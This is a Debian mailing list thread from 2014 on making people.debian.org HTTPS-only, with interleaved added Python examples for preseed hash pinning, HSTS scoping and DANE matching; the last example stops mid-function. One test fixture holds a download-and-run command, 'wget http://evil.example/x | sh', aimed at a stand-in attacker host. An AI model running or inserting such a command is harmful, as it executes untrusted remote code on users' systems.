> Hi Jacob,
>
> On Mon, Jul 21, 2014 at 01:14:14PM +0000, Jacob Appelbaum wrote:
>> I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point?
>
> I am not a lawyer but I am a radio amateur. Here is a link to the Ofcom Amateur Radio terms:
>
> https://services.ofcom.org.uk/amateur-terms.pdf
>
>     11(2) The Licensee shall only address Messages to other Amateurs or to the stations of those Amateurs and shall not encrypt these Messages for the purpose of rendering the Message unintelligible to other radio spectrum users.

It sounds like it would be good to call and clarify things with a technologically literate lawyer.

> I would take this to mean that no part of the message can be encrypted.

By that reasoning, we may not authenticate except by sending plaintext passwords over such a network. That seems to either be an old policy, a mistake or a network that is simply hostile towards modern security requirements for individuals.

This seems to be relevant:

https://www.tapr.org/pdf/DCC2010-AX.25-AuthenticationEffects-KE5LKY.pdf

> More importantly, I suspect would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org? This is not beyond the realm of possibility.

I acknowledge the possibility and was inquiring about *actuality* rather than mere possibility. Is anyone actually using IPv4 over AX.25 to access people.debian.org?

> It would be permitted by the Ofcom terms to download Amateur Radio software from p.d.o and also to browse Amateur Radio software documentation hosted there, which are both things that the Debian policy would permit to be hosted.

Is anyone hosting software on p.d.o and actually having it downloaded over a radio link? That sounds like a good project but I wonder if practically it happens in the wild?

> There are likely also other cases, which granted are likely edge cases, where encryption cannot be used.

We should not be beholden to the lowest common denominator. This seems especially so when it is a matter of theory and without practical issue.

All the best,
Jacob

Archive: https://lists.debian.org/cafggdf0ob2hulvncvwy_u8pf_rdbz9ynstjl5oyiwsce0ix...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 02:38:14PM +0000, Jacob Appelbaum wrote:
> On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote:
>
> By that reasoning, we may not authenticate except by sending plaintext passwords over such a network. That seems to either be an old policy, a mistake or a network that is simply hostile towards modern security requirements for individuals.

I would say that a message digest to authenticate a message doesn't obscure its meaning for other amateurs as others could use it to verify the same message in the same way as the intended recipient. If SSL were used only for authentication, using a NULL cipher, then I would think that would be allowed, but also I would question any webserver that has SSL enabled with a NULL cipher also enabled.

Remember, I'm not asking for HTTPS to not be default, just for an alternative VHOST name to be available without HTTPS. Users would have to be explicitly asking for it and it's only a few lines of Apache configuration to set up.

> Is anyone hosting software on p.d.o and actually having it downloaded over a radio link? That sounds like a good project but I wonder if practically it happens in the wild?

This is probably something I would have done, as I'm just getting back into amateur radio. I have not done it yet though. I would be interested to hear if there are any use cases out there. I bet they are part of rather cool projects.

> We should not be beholden to the lowest common denominator. This seems especially so when it is a matter of theory and without practical issue.

This is not what I'm asking for, just a separate VHOST for those that want to use it. Of course, it's probably trivial to set up an HTTP service that proxies to the HTTPS one, but it's even more trivial to add those few lines of config to add a VHOST on the new machine.

Iain.

--
e: i...@fsfe.org  w: iain.learmonth.me  x: i...@jabber.fsfe.org
t: +447875886930  c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
RFH Packaging DNSSEC/TLSA Validator (Was: people.debian.org will move from ravel to paradis and become HTTPS only)
Hi,

On Sun, Jul 20, 2014, at 08:47, Tollef Fog Heen wrote:
> Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection.

my team has just produced js-types version of DNSSEC/TLSA Validator so it won't break with recent Mozilla changes. (Should be published soon at www.dnssec-validator.cz - I have a RC binary if you are interested.)

Would there be somebody willing to help me with packaging? I have never packaged xul plugin, so it probably would be faster if there's somebody with *free time* (that I also lack) and skill. We have also got rid of FireBreath framework and other stuff, so the packaging should be much easier now.

I will stay on packaging team, I just need a kick-off (or at least a tip for good existing package I can cannibalize...)

Ondrej
--
Ondřej Surý ond...@sury.org
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server

Archive: https://lists.debian.org/1405956064.22784.143988757.47da5...@webmail.messagingengine.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Jacob Appelbaum ja...@appelbaum.net, 2014-07-21, 13:09:
> I'm also curious - is there a Debian developer who will not use HTTPS but does use SSH to access servers?

Very unlikely, with or without the “but …” part. (But I'm afraid I don't understand what point you're trying to make.)

> Is Debian still offering telnet services too?

I don't think so.

> What other unsafe protocols are standard and in use?

Off the top of my head: e-mail, FTP, LDAP, IRC.

(assuming that “unsafe” means “with no (or nonmandatory) encryption”)

--
Jakub Wilk

Archive: https://lists.debian.org/20140721165251.ga4...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Peter Palfrader wea...@debian.org, 2014-07-20, 12:07:
> we have been moving towards https for most services over the last 12 months.

Is it intentional that the http-https redirect for bugs.d.o is only temporary (302)?

Should we update devscripts and python-debianbts to use HTTPS for accessing this host?

Do you plan to enable HTTPS on incoming.d.o and lintian.d.o?

--
Jakub Wilk

Archive: https://lists.debian.org/20140721174418.ga9...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Saturday 19 July 2014 22:54:47 you wrote:
> ]] Wouter Verhelst
>
>> On Sunday 13 July 2014 22:13:10 Martin Zobel-Helas wrote:
>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>>
>> Why?
>
> Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today.

Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days.

It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed.

>> Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.
>
> Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks

True, but debian-installer simply does not support any signed/encrypted preseeding. Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.

> unless you do extra checking against checksums (something d-i doesn't support, AFAIK).

Also true.

Granted, these are probably bugs, and IIRC Colin was working on providing HTTPS support for jessie. Still, while I support enabling HTTPS for people.d.o, I think disabling HTTP is overdoing it.

>> Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?
>
> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.

So name one?

--
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/1537194.az5tuca...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
]] Wouter Verhelst

> On Saturday 19 July 2014 22:54:47 you wrote:
>> ]] Wouter Verhelst
>>
>>> On Sunday 13 July 2014 22:13:10 Martin Zobel-Helas wrote:
>>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>>>
>>> Why?
>>
>> Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today.
>
> Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days.

I don't see a big difference between reading mail in pine, which people did using telnet and reading mail in their browser over HTTP. Or IRC and twitteresque services. (I wouldn't call things like mail clients and social media control interfaces either.)

> It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed.

Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs? We could do something like that, where if you absolutely must use HTTP, you can, but it's more annoying and tedious than the better alternative.

>>> Please note that there remain cases where accessing HTTPS is difficult or impossible. One of these (but by no means the only one) is the current release of debian-installer: the wget implementation inside stable d-i does not support https, so downloading files from people.d.o (e.g., for preseeding) will become impossible if this is implemented as stated.
>>
>> Hopefully you're not preseeding from a HTTP source, since that means you're quite vulnerable to trivial MITM attacks
>
> True, but debian-installer simply does not support any signed/encrypted preseeding.

Nod; as an aside, having the ability to do preseed=http(s)://url/ preseed_sha256=$sha256 would be pretty useful.

> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.

Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection.

>>> Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?
>>
>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>
> So name one?

To pick a random example off a web page:

http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/

    wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to
    sed -i 's/lenny/wheezy/' add-firmware-to
    chmod +x add-firmware-to
    ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy

--
Tollef Fog Heen
UNIX is user friendly, it's just picky about who its friends are

Archive: https://lists.debian.org/87wqb8edck@xoog.err.no
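The "preseed=http(s)://url/ preseed_sha256=$sha256" idea in the message above is a download pin: the installer would refuse a preseed file whose SHA-256 does not match the digest typed on the kernel command line, so a MITM on a plain-HTTP fetch buys the attacker nothing. The following is an added example, not code from debian-installer or from anyone in this thread, of what that check looks like. The `preseed_sha256` parameter is hypothetical (it does not exist in d-i); `preseed/url` is a real d-i parameter; the preseed contents and the fetcher are constructed stand-ins so the check runs offline. The policy it implements (pin required over http, TLS accepted as the only integrity check over https) is an assumption chosen to match the thread's argument, not d-i behaviour.

```python
import hashlib
import hmac
import shlex
from urllib.parse import urlsplit

URL_PARAM = "preseed/url"          # real debian-installer parameter
HASH_PARAM = "preseed_sha256"      # hypothetical, modelled on Tollef's suggestion


def parse_cmdline(cmdline):
    """Turn a kernel command line into a dict; bare flags map to None."""
    params = {}
    for token in shlex.split(cmdline):
        key, sep, value = token.partition("=")
        params[key] = value if sep else None
    return params


def verify_preseed(data, expected_hex):
    """True only if sha256(data) equals the pinned hex digest (constant-time compare)."""
    if len(expected_hex) != 64:
        raise ValueError("%s must be 64 hex characters" % HASH_PARAM)
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.lower())


def load_preseed(cmdline, fetch):
    """Fetch the preseed named on the command line and refuse it unless its
    integrity is covered either by the pin or (unpinned) by TLS on the transport.
    `fetch` is a callable url -> bytes, injected so no network is needed here."""
    params = parse_cmdline(cmdline)
    url = params.get(URL_PARAM)
    pin = params.get(HASH_PARAM)
    if not url:
        raise ValueError("no %s on the command line" % URL_PARAM)
    if pin is None:
        if urlsplit(url).scheme != "https":
            # Plain HTTP and no pin: an on-path attacker can hand us anything.
            raise RuntimeError("refusing unpinned preseed over plain HTTP: %s" % url)
        return fetch(url)
    data = fetch(url)
    if not verify_preseed(data, pin):
        raise RuntimeError("preseed digest mismatch for %s" % url)
    return data


# Constructed sample preseed and a tampered version standing in for a MITM.
GOOD_PRESEED = b"d-i passwd/root-login boolean false\n"
GOOD_SHA256 = hashlib.sha256(GOOD_PRESEED).hexdigest()
TAMPERED_PRESEED = b"d-i preseed/late_command string wget http://evil.example/x | sh\n"

HTTP_URL = "http://people.debian.org/~user/preseed.cfg"
HTTPS_URL = "https://people.debian.org/~user/preseed.cfg"


def _rejected(cmdline, fetch):
    try:
        load_preseed(cmdline, fetch)
    except RuntimeError:
        return True
    return False


def demo():
    """Returns (good accepted, tampered rejected, unpinned http rejected, unpinned https accepted)."""
    pinned = "auto=true priority=critical %s=%s %s=%s" % (URL_PARAM, HTTP_URL, HASH_PARAM, GOOD_SHA256)
    unpinned_http = "auto=true priority=critical %s=%s" % (URL_PARAM, HTTP_URL)
    unpinned_https = "auto=true priority=critical %s=%s" % (URL_PARAM, HTTPS_URL)
    good = load_preseed(pinned, lambda url: GOOD_PRESEED) == GOOD_PRESEED
    tampered_rejected = _rejected(pinned, lambda url: TAMPERED_PRESEED)
    http_rejected = _rejected(unpinned_http, lambda url: GOOD_PRESEED)
    https_ok = load_preseed(unpinned_https, lambda url: GOOD_PRESEED) == GOOD_PRESEED
    return good, tampered_rejected, http_rejected, https_ok
```

The pin only protects the file it names; a preseed that itself fetches further scripts (`late_command` with a `wget ... | sh`) reopens the problem one hop later, which is the point Wouter makes further down the thread.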
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.

But that implies that the attacker has access to private keys, and in this case you are so screwed. The possibility of stolen private keys should not be argument for not implementing security.

>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>
> So name one?

Pervasive monitoring.

Really we should introduce encryption *everywhere*.

O.
--
Ondřej Surý ond...@sury.org
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server

Archive: https://lists.debian.org/1405841035.16130.143560421.61491...@webmail.messagingengine.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi,

Ondřej Surý:
> Pervasive monitoring.

In and of itself, if you only access publicly-available files, that's not a threat.

> Really we should introduce encryption *everywhere*.

This change does not introduce encryption. It disables the option not to use encryption.

I can accept that e.g. if you're using basic-auth or similar cleartext password schemes on the link. Otherwise, not so much.

In other words: please add HTTPS capabilities to d-i before you do that.

--
-- Matthias Urlichs

Archive: https://lists.debian.org/20140720083823.gd15...@smurf.noris.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 09:23:55 you wrote:
> On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
>> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.
>
> But that implies that the attacker has access to private keys, and in this case you are so screwed.

My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to.

> The possibility of stolen private keys should not be argument for not implementing security.

I'm not against implementing security -- I'm against forcing https where it makes no sense.

>>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>>
>> So name one?
>
> Pervasive monitoring.
>
> Really we should introduce encryption *everywhere*.

I realize that in these days of Snowden and similar things it is fashionable to say that there's someone snooping every connection everywhere, but I don't think that's a) a very strong argument, or b) blocked by use of HTTPS (if the pervasive monitoring kind of people like the NSA want to, they'll just subpoena those who have access to the secret data and get what they want).

Additionally, and again, I'm not against allowing HTTPS for those who want to make pervasive monitoring harder--I'm against disabling plain HTTP just for the sake of it. Sure, enable HTTPS, and yeah, sure, enable HSTS too. But disabling HTTP? That doesn't serve any useful purpose.

--
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/1915517.jyrk2gy...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 08:47:07 Tollef Fog Heen wrote:
> ]] Wouter Verhelst
>
>> On Saturday 19 July 2014 22:54:47 you wrote:
>>> ]] Wouter Verhelst
>>>
>>>> On Sunday 13 July 2014 22:13:10 Martin Zobel-Helas wrote:
>>>>> Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
>>>>
>>>> Why?
>>>
>>> Because the world is a nastier place than it used to be. It's like the move from telnet to SSH many moons ago, all protocols ought to be encrypted today.
>>
>> Well, I disagree with that. With telnet vs SSH, the move was necessary because telnet would send passwords in the clear, and because telnet is mostly a control interface rather than anything else. With HTTP vs HTTPS, the move can be necessary (many control interfaces these days are written in HTTP server-side code, and then using plain HTTP is a bad idea), but I doubt the majority of uses for people.debian.org is anything but downloading static files these days.
>
> I don't see a big difference between reading mail in pine, which people did using telnet and reading mail in their browser over HTTP. Or IRC and twitteresque services.

Oh sure, I agree that in those cases it makes perfect sense to disable plain HTTP. But that's not what this is. AFAIK, people.debian.org does not allow running server-side HTTP scripts (and even if it does, I think that's a bad idea and we should disable it ASAP). As such, people.debian.org is not an interface for reading mail in your browser over HTTP, or doing IRC, or whatnot. So that argument simply doesn't apply.

Instead, people.d.o is a place to allow downloads of files. Period. Sometimes it should be possible to verify that these files have not been tampered with. With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring.

> (I wouldn't call things like mail clients and social media control interfaces either.)

Well, I would, but that's just semantics, and so has little relevance in this discussion.

>> It's good to make HTTPS the default, which if you must you can do (amongst other things) by way of HSTS. However, I fail to see why we should make HTTP impossible for those cases where it's needed.
>
> Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs? We could do something like that, where if you absolutely must use HTTP, you can, but it's more annoying and tedious than the better alternative.

I suppose that could work, although it might make HSTS fail (but I must admit I don't understand HSTS in detail).

[...]

>> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.
>
> Not many HTTP clients support DANE, unfortunately, and MITM-ing DNSSEC-secured domains is a bit more effort than just MITM-ing a plaintext HTTP connection.

If you can MITM people.debian.org, you've already MITM'ed a DNSSEC-secured domain.

>>>> Is there an actual attack vector that we're trying to protect against which requires us to disable plain HTTP, or is this just yet another instance of the bogus "HTTP is obsolete" idea?
>>>
>>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>>
>> So name one?
>
> To pick a random example off a web page:
>
> http://ghantoos.org/2012/10/21/cocktail-of-pxe-debian-preseed-ipmi-puppet/
>
>     wget http://people.debian.org/~dannf/add-firmware-to/add-firmware-to
>     sed -i 's/lenny/wheezy/' add-firmware-to
>     chmod +x add-firmware-to
>     ./add-firmware-to initrd.gz initrd.nonfree.gz wheezy

The problem here is not the idea that someone might MITM people.debian.org and provide something useless. The problem is a culture of people who run random code off the web without checking what it does. That ghantoos.org thing might refer to people.deb1an.org instead which contains nothing but malware; if you download and run code off the internet without checking it, you've already lost. This isn't very special in that regard, and that's not something you can fix by forcing HTTPS on people.

Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS.

Again, I support enabling HTTPS, and I support making it the default if possible. I just don't think disabling plain HTTP is a good idea.

--
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, Jul 20, 2014 at 09:23:55AM +0200, Ondřej Surý wrote:
> On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
>>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>>
>> So name one?
>
> Pervasive monitoring.
>
> Really we should introduce encryption *everywhere*.

If this were DSA's position, I would disagree with it, but I would understand where they're coming from. But DSA has *not* said that this is the reason for enforcing use of a protocol with significantly higher overhead. I do think that if DSA are going to enforce such a policy, they should be able to explain why.

--
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
Ubuntu Developer                                    http://www.debian.org/
slanga...@ubuntu.com                                     vor...@debian.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Tollef Fog Heen tfh...@err.no, 2014-07-20, 08:47:
> Would you be happy with http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file as the URLs?

No need to be condescending. :-(

Also, I wouldn't say “insecure”, which might be vague in this context.

My proposal: http://nohttps.people.debian.org/~user/file

--
Jakub Wilk

Archive: https://lists.debian.org/20140720100359.ga6...@jwilk.net
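Two opt-out schemes are on the table in the messages above: Tollef's path-based URL under people.debian.org (which Wouter suspects "might make HSTS fail") and Jakub's separate hostname. The difference is exactly how HTTP Strict Transport Security (RFC 6797) scopes a policy: by host, never by path, and down into subdomains only if the header says `includeSubDomains`. The following is an added example, not code from any browser or from this thread, modelling a user agent's HSTS cache just far enough to show which scheme survives once the browser has seen the people.debian.org policy once. The header values and the fixed clock are constructed inputs.

```python
import time
from urllib.parse import urlsplit


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains)."""
    max_age, include_sub = None, False
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            max_age = int(value.strip().strip('"'))
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None:
        raise ValueError("Strict-Transport-Security requires max-age")
    return max_age, include_sub


class HstsCache:
    """Known-HSTS-host store as a browser keeps it: host -> (expiry, includeSubDomains)."""

    def __init__(self, now=time.time):
        self.now = now
        self.policies = {}

    def observe(self, url, header):
        """Record a policy from a response; RFC 6797 only honours it over TLS."""
        parts = urlsplit(url)
        if parts.scheme != "https":
            return                      # header seen over plain HTTP is ignored
        max_age, include_sub = parse_hsts(header)
        host = parts.hostname.lower()
        if max_age == 0:
            self.policies.pop(host, None)   # max-age=0 revokes the policy
        else:
            self.policies[host] = (self.now() + max_age, include_sub)

    def must_upgrade(self, url):
        """Would the user agent rewrite this http:// URL to https:// before sending?"""
        parts = urlsplit(url)
        if parts.scheme != "http":
            return False
        labels = parts.hostname.lower().split(".")
        for i in range(len(labels)):             # exact host, then each parent domain
            policy = self.policies.get(".".join(labels[i:]))
            if policy is None:
                continue
            expiry, include_sub = policy
            if expiry <= self.now():
                continue                         # expired entry, treat as absent
            if i == 0 or include_sub:
                return True
        return False


def demo():
    """Constructed walk-through of the two opt-out schemes; returns five booleans."""
    cache = HstsCache(now=lambda: 1000.0)
    cache.observe("http://people.debian.org/", "max-age=31536000")
    http_header_ignored = not cache.must_upgrade("http://people.debian.org/~user/file")
    # First HTTPS visit pins the host for a year.
    cache.observe("https://people.debian.org/~user/file", "max-age=31536000")
    path_optout_blocked = cache.must_upgrade(
        "http://people.debian.org/THIS-IS-INSECURE/YES-I-WANT-TO-PROCEED/~user/file")
    separate_host_free = not cache.must_upgrade("http://nohttps.people.debian.org/~user/file")
    # A policy with includeSubDomains would drag the separate host in as well.
    cache.observe("https://people.debian.org/", "max-age=31536000; includeSubDomains")
    separate_host_caught = cache.must_upgrade("http://nohttps.people.debian.org/~user/file")
    # And max-age=0, sent over HTTPS, clears it again.
    cache.observe("https://people.debian.org/", "max-age=0")
    cleared = not cache.must_upgrade("http://people.debian.org/~user/file")
    return http_header_ignored, path_optout_blocked, separate_host_free, separate_host_caught, cleared
```

So a path under the HSTS host is unreachable over plain HTTP for any browser that has visited the HTTPS site within max-age, whereas a sibling hostname works as long as the policy does not set `includeSubDomains` (and the same holds for a preload-list entry, which is not modelled here).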
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 20 July 2014 10:07, Wouter Verhelst w...@uter.be wrote:
> With the state of the CA cartel these days, I have little trust in the strength of HTTPS as a verification mechanism, and so I wouldn't trust a file to be correct even if it came through an HTTPS connection that validates. Instead, I would only trust such a file if it came with a GPG signature from a key that is in the Debian keyring.

Good, because that's not what HTTPS does for you. It makes it more difficult to watch exactly what you're accessing.

Suppose for example I uploaded a preseed file to people.debian.org that created a Tor relay, and a suitably large government agency wanted to see all the IP addresses installing it. With HTTP, they just break into the internet backbone at an appropriate point, and log every request for that file in a *completely undetectable manner*. With HTTPS, they either need to break into the machine running people.debian.org, or start presenting a different SSL certificate - both things which can potentially be detected.

Another situation is if a dissident accesses people.debian.org via Tor. With HTTP, the operator of the exit node they are using could MITM the request and tamper with the file - no state intervention required. If it's a web page, they could potentially attempt to exploit the browser.

>> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.

In this scenario, you gain that if the adversary wants to see what you're doing with your HTTPS connection, they need to do something potentially noticeable like change the SSL certificate being offered.

> Again, I support enabling HTTPS, and I support making it the default if possible. I just don't think disabling plain HTTP is a good idea.

Annoyingly, unless d-i supports SSL (or runs Tor), taking this very sensible move is rather inconvenient.

Another potential use for plain HTTP would be if we installed a Tor hidden service on paradis, and published the address in a GPG-signed message. You would avoid the CA cartel, and have some assurance of privacy.

Kind regards,

--
Tim Retout dioc...@debian.org

Archive: https://lists.debian.org/cadc0ge-agleh5eyfkm13mvfxhmumdpamcamofazbzqgashm...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014 10:45:10 +0200, Wouter Verhelst w...@uter.be wrote:
> On Sunday 20 July 2014 09:23:55 you wrote:
>> On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
>>> Additionally, since debian.org uses DNSSEC, if you can somehow MITM people.debian.org then due to DANE you can MITM it for HTTP as well as HTTPS, so forcing HTTPS really doesn't gain you much.
>>
>> But that implies that the attacker has access to private keys, and in this case you are so screwed.
>
> My point exactly: if someone can somehow MITM people.debian.org they have access to private key material that they shouldn't have access to.

I might be missing something, and I admit not having read the entire thread, but how would they have access to private key material? _My_ GPG key has never been near people.debian.org, and I suspect that key ring management would (rightfully!) promptly kick any public key whose private key was found on p.d.o out of the keyring.

Greetings
Marc
--
!! No courtesy copies, please !!
Marc Haber         | "Questions are the            | Mailadresse im Header
Mannheim, Germany  |  Beginning of Wisdom"         | http://www.zugschlus.de/
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834

Archive: https://lists.debian.org/e1x8nzn-0007a3...@swivel.zugschlus.de
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Steve Langasek wrote:
> On Sun, Jul 20, 2014 at 09:23:55AM +0200, Ondřej Surý wrote:
>> On Sun, Jul 20, 2014, at 08:15, Wouter Verhelst wrote:
>>>> There are lots of attack vectors. It's not a response to a single attack being exploited in the wild.
>>>
>>> So name one?
>>
>> Pervasive monitoring.
>>
>> Really we should introduce encryption *everywhere*.
>
> If this were DSA's position, I would disagree with it, but I would understand where they're coming from. But DSA has *not* said that this is the reason for enforcing use of a protocol with significantly higher overhead. I do think that if DSA are going to enforce such a policy, they should be able to explain why.

What Ondřej said
--
                           |  .''`.        ** Debian **
      Peter Palfrader      | : :' :      The  universal
 http://www.palfrader.org/ | `. `'      Operating System
                           |   `-    http://www.debian.org/

Archive: https://lists.debian.org/20140720100121.gi...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, 20 Jul 2014, Ondřej Surý wrote:
> Pervasive monitoring.
>
> Really we should introduce encryption *everywhere*.

And indeed we have been moving towards https for most services over the last 12 months. www is still not done, due to unfortunate push-back by the service owners, but most others have migrated quite successfully.
--
                           |  .''`.        ** Debian **
      Peter Palfrader      | : :' :      The  universal
 http://www.palfrader.org/ | `. `'      Operating System
                           |   `-    http://www.debian.org/

Archive: https://lists.debian.org/20140720100747.gj...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
At Sun, 20 Jul 2014 11:07:16 +0200, Wouter Verhelst wrote:
> Even ignoring that, assuming people trust that code off people.debian.org is safe, if they run a validating DNS resolver they don't run more of a risk than if they use only HTTPS.

I don't really follow that. A validating DNS resolver only makes sure you connect to the right IP address. DANE can specify the certificate to use for HTTPS, but you can't forward HTTP requests to HTTPS with DANE as far as I know. In the case of HTTP a MITM attack can send a fake response to the HTTP request without the need for any key material/certificates or need to fake DNSSEC. For HTTPS it would need to have a certificate for people.debian.org that the client trusts.

Kind regards,

Jeroen Dekkers

Archive: https://lists.debian.org/87silwjo6w.wl%jer...@dekkers.ch
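The asymmetry Jeroen describes above is the whole point of DANE: with a TLSA record (RFC 6698) the zone owner states which certificate or key a TLS client must see, so a MITM on the HTTPS side needs a certificate that matches the record, while a MITM on plain HTTP needs nothing. The following is an added example, not code from any DANE validator, this thread, or the DNSSEC/TLSA Validator mentioned elsewhere in it, of the matching step a client performs once it has a DNSSEC-validated TLSA record and the server's end-entity certificate. It handles only certificate usage 3 (DANE-EE), selectors 0 (full certificate) and 1 (SubjectPublicKeyInfo), and matching types 0 and 1; the certificates it checks are constructed, unsigned DER skeletons built inline so the SPKI extraction can be exercised without a real PKI, and the minimal DER walker assumes the definite-length encoding that X.509 uses.

```python
import hashlib
import hmac

USAGE_DANE_EE = 3                           # RFC 6698 certificate usage "domain-issued"
SELECTOR_FULL_CERT, SELECTOR_SPKI = 0, 1
MATCH_EXACT, MATCH_SHA256 = 0, 1


def der_read_tlv(buf, pos):
    """Read one definite-length DER TLV at buf[pos:] -> (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low bits give the length's size
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_children(value):
    """Split SEQUENCE content into the raw bytes of each child TLV."""
    out, pos = [], 0
    while pos < len(value):
        _, _, nxt = der_read_tlv(value, pos)
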